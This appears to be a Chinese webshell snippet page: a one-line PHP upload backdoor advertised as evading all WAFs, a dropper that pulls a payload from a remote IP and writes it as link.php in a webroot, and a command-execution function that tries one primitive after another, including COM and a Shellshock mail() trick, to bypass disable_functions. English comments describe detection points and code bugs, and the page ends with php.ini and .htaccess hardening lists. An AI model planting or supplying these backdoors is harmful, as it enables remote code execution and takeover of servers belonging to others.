文件上传表单后门,比较不错通杀所有waf
// One-line upload backdoor: include_once() is handed the temp path of a
// multipart upload field named only_pcd, so whatever PHP the uploaded file
// contains runs immediately, before the file ever reaches a webroot. The '@'
// hides the warning when the field is missing. PHP keywords are
// case-insensitive, so the uppercase spelling is valid and signature rules
// must match include/require case-insensitively. The reliable detection
// point is any include/require whose argument is $_FILES[...]['tmp_name'].
@INCLUDE_ONCE($_FILES['only_pcd']['tmp_name']);
?>
保存之后
本地构建一个上传表单
你传什么
它就执行什么
php下载远程文件写入服务器
// Fetches the body of $url and returns it as a string, or false when the
// transfer fails. Prefers the curl extension; otherwise falls back to
// file_get_contents() over a stream context. It is used below to pull a
// remote payload onto the server, so from a defender's view the outbound
// request itself is the signal: a web-server process opening an HTTP
// connection to an arbitrary host (egress filtering / proxy logs catch it).
function Reads($url){
// Non-strict in_array() is harmless here: get_loaded_extensions() returns strings.
if (in_array('curl', get_loaded_extensions())) {
$handle = curl_init();
curl_setopt_array($handle, array(
// USER_AGENT is not defined anywhere in this listing. If it is undefined at
// run time this is a fatal Error on PHP 8 (a warning plus the bare name on PHP 7).
CURLOPT_USERAGENT => USER_AGENT,
// Redirects are followed, so the host actually contacted may differ from $url.
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_HEADER => false,
CURLOPT_HTTPGET => true,
// Body is returned from curl_exec() rather than echoed.
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 30,
CURLOPT_URL => $url
));
// curl_exec() gives the body string, or false on any transport error.
$html = curl_exec($handle);
curl_close($handle);
return $html;
}
// Fallback: plain GET with an 8-second timeout; no redirect or TLS options are set.
$opts = array('http' => array('method' => "GET",'timeout' => 8));
$context = stream_context_create($opts);
$html = file_get_contents($url, false, $context);
// One blind retry when the body is empty or the read failed
// (empty() is true for both false and "").
if(empty($html)){
$html = file_get_contents($url, false, $context);
}
return $html;
}
// Dropper: fetch a remote file and write it to disk as link.php. The URL host
// is a bare IP and the destination is a hard-coded Windows path under what
// looks like a document root, so the two detection points are the outbound
// HTTP request and the web-server process creating a .php file there.
$c=Reads('http://11.11.222.111/cc.txt');
// '@' hides an open failure; if fopen() returns false the fwrite()/fclose()
// below are called with false instead of a stream (a TypeError on PHP 8,
// a warning and a silently lost write on PHP 7).
$fp = @fopen('D:/wwwroot/xxx.com/xxx/link.php',"w");
// $c may be false when the fetch failed; it is then written as an empty string.
fwrite($fp,$c);
fclose($fp);
?>
php命令执行脚本代码,多个安全函数执行
// Runs a shell command through whichever execution primitive is still
// available and returns its output as a string. The elseif chain is the
// classic disable_functions probe: each branch is reached only when every
// earlier one was unavailable, which is why the hardening lists further down
// the page must cover every name used here. Note that the first list
// (disable_functions =exec,...) omits putenv and mail, which the last branch
// relies on, and that disable_functions applies to functions only - the COM
// class used below needs disable_classes or the extension removed.
function Exec_Run($cmd)
{
$res = '';
// exec(): output lines arrive in $res as an array and are joined with CRLF.
if(function_exists('exec')){@exec($cmd,$res);$res = join("\r\n",$res);}
// shell_exec() returns null (not '') when the command prints nothing.
elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
// system()/passthru() print directly, so output buffering captures the text.
elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
// popen(): the assignment inside the condition opens the pipe; read in 1 KiB chunks.
elseif(@is_resource($f=@popen($cmd,'r'))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
// Windows only (script directory does not start with "/") with the COM
// extension loaded: WScript.Shell.Exec runs the command outside the
// disable_functions mechanism entirely.
elseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists('COM')){$w=new COM('WScript.shell');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();}
// proc_open(): $aliases is never assigned in this function, so the isset()
// rewrite is dead code. stdout then stderr are read to EOF and HTML-escaped,
// unlike the other branches, which return raw output. If proc_open() fails,
// $io is never populated and the feof() calls below error out.
elseif(function_exists('proc_open')){$length = strcspn($cmd," \t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');}fclose($io[1]);fclose($io[2]);proc_close($p);}
// Last resort: the Shellshock-style bash environment-variable function
// injection. It only applies when /bin/sh resolves to bash (readlink check);
// the command is placed in PHP_LOL via putenv() and executed when mail()
// spawns sendmail through the shell, with output redirected to $tmp.
// $tmp is assigned only inside the "bash" branch, so in the non-bash case
// the "Not vuln (not bash)" result is immediately overwritten by
// "No output, or not vuln." below. Patched bash ignores the payload;
// disabling putenv and mail, as the longer list on this page does, removes the path.
elseif(function_exists('mail')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("a@127.0.0.1","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";}
return $res;
}
// Probe call: prints the identity the web-server process runs as. The
// presence of this output in a response body, or of requests hitting a
// script that contains Exec_Run, is a direct indicator the shell is active.
echo Exec_Run('whoami');
php.ini 安全函数禁用
disable_functions =exec,passthru,popen,proc_open,shell_exec,system,assert,chroot,getcwd,scandir
Disabled functions: COM,opendir,get_cfg_var,eval,phpinfo,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,escapeshellcmd,dll,popen,disk_free_space,checkdnsrr,checkdnsrr,getservbyname,getservbyport,disk_total_space,posix_ctermid,posix_get_last_error,posix_getcwd, posix_getegid,posix_geteuid,posix_getgid, posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid, posix_getppid,posix_getpwnam,posix_getpwuid, posix_getrlimit, posix_getsid,posix_getuid,posix_isatty, posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid, posix_setpgid,posix_setsid,posix_setuid,posix_strerror,posix_times,posix_ttyname,posix_uname,getcwd,assert
精简一点的版本『禁用后什么都执行不了,管理员可以根据需求进行修改』
mail,eval,assert,phpinfo,passthru,exec,system,shell_exec,proc_open,popen,dl,pcntl_exec,putenv,touch,chown,chmod,chroot,get_cfg_var,ini_alter,ini_restore,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,escapeshellcmd,socket_create,unlink,chown,touch,ini_set,opendir,readdir,scandir,dir,pipe,win_shell_execute,win32_create_service
禁止当前目录执行脚本
.htaccess
Order allow,deny
Deny from all
.htaccess 如果不能执行PHP就在这里面加
AddType text/html .shtml
AddHandler server-parsed .shtml
DirectoryIndex index.shtml index.html index.htm index.php
Options +IncludesNoExec -ExecCGI